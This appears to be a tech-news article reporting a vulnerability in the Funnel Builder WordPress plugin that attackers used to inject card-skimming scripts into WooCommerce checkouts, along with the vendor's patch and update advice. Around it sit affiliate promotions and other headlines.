WordPress Funnel Builder Bug Exposes 40K Sites to Card Theft
Critical flaw in Funnel Builder plugin lets attackers inject malicious scripts, affecting thousands of WooCommerce sites.
A critical vulnerability in the popular Funnel Builder plugin for WordPress has put over 40,000 websites at risk, enabling attackers to steal sensitive credit card information. This flaw, affecting all versions of the plugin prior to 3.15.0.3, has been actively exploited by malicious actors who inject harmful JavaScript into WooCommerce checkout pages.
The Vulnerability
Security firm Sansec uncovered this alarming issue, revealing that the exploit allows attackers to modify the plugin’s global settings through an unsecured, publicly accessible endpoint. This enables the insertion of arbitrary JavaScript into the plugin’s 'External Scripts' setting, leading to the execution of malicious code on checkout pages.
The malicious code masquerades as a legitimate Google Tag Manager or Google Analytics script, which then opens a WebSocket connection to a rogue server. This server distributes a customized payment card skimmer, stealing critical data such as credit card numbers, CVVs, billing addresses, and other customer information.
Hardware keys and password managers used by security pros.
FunnelKit's Response
FunnelKit, the developer behind the Funnel Builder plugin, has responded quickly by releasing an updated version 3.15.0.3 to address this security gap. The company has confirmed the malicious activity and urges users to update their plugins immediately through the WordPress dashboard. Additionally, administrators are advised to scrutinize their settings for any unauthorized scripts that may have been added by attackers.
This incident highlights the necessity for regular updates and vigilant monitoring of site plugins, especially those handling financial transactions.
Context
The European e-commerce market is particularly vulnerable to such threats given its reliance on WordPress plugins like Funnel Builder to enhance conversion rates. This incident echoes past vulnerabilities in e-commerce platforms that have led to significant financial losses and data breaches. With GDPR in place, European businesses face additional pressure to maintain stringent data protection standards.
What this means for you
If you're a website owner or administrator using the Funnel Builder plugin, it's imperative to update to the latest version immediately. This update not only patches the vulnerability but also helps prevent potential financial and reputational damage. Ensure to review your site settings for any suspicious scripts to mitigate further risks.
What's still unclear
While FunnelKit has patched the vulnerability, questions remain about the extent of the data breach and how many users have been affected. Additionally, it’s uncertain how many websites have yet to implement the necessary updates to protect themselves.
Why this matters
Security flaws in widely-used plugins like Funnel Builder pose significant risks to online businesses and their customers. This vulnerability underlines the importance of regular software updates and vigilant security practices to safeguard sensitive data. As the digital landscape evolves, so too must our efforts to protect it from emerging threats.
Hardware keys and password managers used by security pros.
Shop security gear →One short email. The most important Security news, fact-checked, no fluff. Free, unsubscribe anytime.
More from Security
Outlook Zero-Click Flaw Lets Hackers Bypass Firewalls
A critical Outlook vulnerability lets attackers compromise systems via email. No user interaction needed, making it a serious threat.
Microsoft 365 Security Workshop: June 2026 Deep Dive
Need to lock down Microsoft 365? A live, online workshop in June 2026 promises hands-on training in identity management, threat protection, and compliance. Get ready.
OpenAI Breach Linked to TanStack Attack; macOS Users Must Update
OpenAI confirmed a security breach tied to the broader TanStack supply chain attack. Two employee devices were impacted, leading to a crucial code-signing certificate rotation.
Hackers Breach OpenAI Code, Prompting Urgent Security Measures
OpenAI reports limited data breach following malware attack on TanStack. No user data compromised. Security measures are underway.
Don’t miss these
Anker Liberty 5 Pro Earbuds Hint at Touchscreen Case
Anker's new Liberty 5 Pro earbuds might just rewrite the rulebook for wireless audio. Rumors point to a touchscreen case and some serious audio tech.
Power Bills Jump 76%: Data Centers Blamed for Grid Strain
Power prices on the PJM grid are up 76%, and an independent monitor points the finger squarely at data centers. The US grid is clearly struggling with our AI-driven electricity needs.
Google Gemini AI Simplifies Lease Jargon for New Renters
Renting your first property? Gemini AI can simplify the jargon in lease agreements, making it easier to understand and negotiate.
Tesla Reveals Teleoperator Crashes in Austin Robotaxi Tests
Tesla admits two Robotaxi crashes in Austin involving teleoperators. The incidents highlight challenges in its autonomous network expansion.
Sam Raimi Takes the Reins on 'Magic' Remake, Taps 'Send Help' Writers
It's official: Sam Raimi is directing the 'Magic' remake for Lionsgate. The 'Send Help' writing team is on board. Plot details? Still under wraps.
Agent 47 Hits the Tabletop: Hitman Board Game Launches Campaign
Agent 47 is ditching the screen for the tabletop. Hitman: The Board Game is now live on Gamefound, promising all the stealth and strategy fans expect.